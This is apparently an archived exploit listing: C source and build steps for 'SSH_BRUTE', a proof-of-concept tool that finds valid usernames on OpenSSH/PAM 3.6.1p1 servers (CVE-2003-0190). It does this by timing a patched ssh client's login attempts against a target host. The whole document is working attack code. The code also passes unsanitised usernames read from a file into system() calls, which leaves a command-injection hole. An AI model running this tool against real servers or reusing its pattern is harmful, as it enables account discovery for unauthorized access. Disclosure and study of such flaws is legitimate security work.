OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool - CVE-2003-0190

1. /*
2. * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
3. * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
4. *
5. *
6. * Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
7. * Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
8. *
9. * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
10. *
11. * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
12. *
13. * $ tar xvfz openssh-3.6.1p1.tar.gz
14. * $ patch -p0 <openssh-3.6.1p1_brute.diff
15. * patching file openssh-3.6.1p1/ssh.c
16. * patching file openssh-3.6.1p1/sshconnect.c
17. * patching file openssh-3.6.1p1/sshconnect1.c
18. * patching file openssh-3.6.1p1/sshconnect2.c
19. * $ cd openssh-3.6.1p1
20. * $ ./configure
21. * $ make
22. * $ cc ../ssh_brute.c -o ssh_brute
23. * $ ./ssh_brute 1 list.txt 192.168.0.66
24. */
25.  
26. #include <stdio.h>
27. #include <stdlib.h>
28. #include <sys/wait.h>
29.  
30. /* an illegal user */
31. #define NO_USER "not_val_user"
32.  
33. /* path of the patched ssh */
34. #define PATH_SSH "./ssh"
35.  
36. /* max time range for invalid user */
37. #define TIME_RANGE 3
38.  
39. int main(int argc, char *argv[])
40. {
41. FILE * in;
42. char buffer[2000], username[100], *host;
43. int time_non_valid = 0, time_user = 0;
44. int version = 1, i = 0, ret;
45.  
46. fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
47. fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");
48.  
49. if (argc < 3) {
50. fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
51. exit(-1);
52. }
53.  
54. version = atoi(argv[1]);
55. host = argv[3];
56.  
57. if ( ( in = fopen(argv[2], "r") ) == NULL ) {
58. fprintf(stderr, "\n Can't open %s\n", argv[2]);
59. exit(-1);
60. }
61.  
62. /* test an illegal user */
63. printf("\n Testing an illegal user\t: ");
64. fflush(stdout);
65.  
66. sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);
67.  
68. for (i = 0; i < 3; i++) {
69. ret = system(buffer);
70. time_non_valid += WEXITSTATUS(ret);
71. }
72.  
73. time_non_valid /= 3;
74.  
75. printf("%d second(s)\n\n", time_non_valid);
76.  
77. time_non_valid += TIME_RANGE;
78.  
79. /* test supplied users */
80. fscanf(in, "%s", username);
81.  
82. while ( !feof(in) ) {
83.  
84. printf(" Testing login %s\t", username);
85.  
86. if (strlen(username) <= 8)
87. printf("\t");
88. printf(": ");
89.  
90. fflush( stdout );
91.  
92. sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);
93. ret = system(buffer);
94. time_user = WEXITSTATUS(ret);
95.  
96. if (time_user <= time_non_valid)
97. printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
98. else {
99. /* valid user? test it again to be sure */
100.  
101. ret = system(buffer);
102. time_user = WEXITSTATUS(ret);
103.  
104. if (time_user <= time_non_valid)
105. printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
106. else
107. printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
108. }
109.  
110. fscanf(in, "%s", username);
111. }
112.  
113. fclose(in);
114.  
115. printf("\n");
116.  
117. exit(0);
118. }
119.  
120.  
121.  
122. // milw0rm.com [2003-04-30]
123.